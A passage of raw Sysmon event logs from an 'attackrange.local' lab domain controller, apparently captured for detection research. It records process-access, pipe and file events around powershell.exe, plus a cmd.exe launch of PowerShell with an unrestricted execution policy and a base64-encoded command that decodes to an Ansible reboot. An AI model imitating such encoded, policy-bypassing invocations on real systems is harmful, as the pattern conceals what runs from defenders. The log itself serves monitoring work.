AEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.451{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.451{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 17141700x8000000000000000747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-CreatePipe2021-03-31 12:00:02.420{266CAFBE-6442-6064-E302-00000000AD01}3020\PSHost.132616656023650293.3020.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x8000000000000000746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.420{266CAFBE-6442-6064-E302-00000000AD01}3020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_go0qlp2x.zza.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.420{266CAFBE-6442-6064-E302-00000000AD01}3020ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ytufaihw.xpv.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.404{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ytufaihw.xpv.ps12021-03-31 12:00:02.404 10341000x8000000000000000743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.388{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.373{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.373{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000740Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.373{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000739Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-6441-6064-DE02-00000000AD01}27844880C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000738Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000737Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000736Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000735Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000734Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000733Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000732Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000731Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000730Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000729Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000728Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.357{266CAFBE-6442-6064-E202-00000000AD01}46403396C:\Windows\system32\cmd.exe{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000727Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.365{266CAFBE-6442-6064-E302-00000000AD01}3020C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6441-6064-D466-120000000000}0x1266d40HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6442-6064-E202-00000000AD01}4640C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQ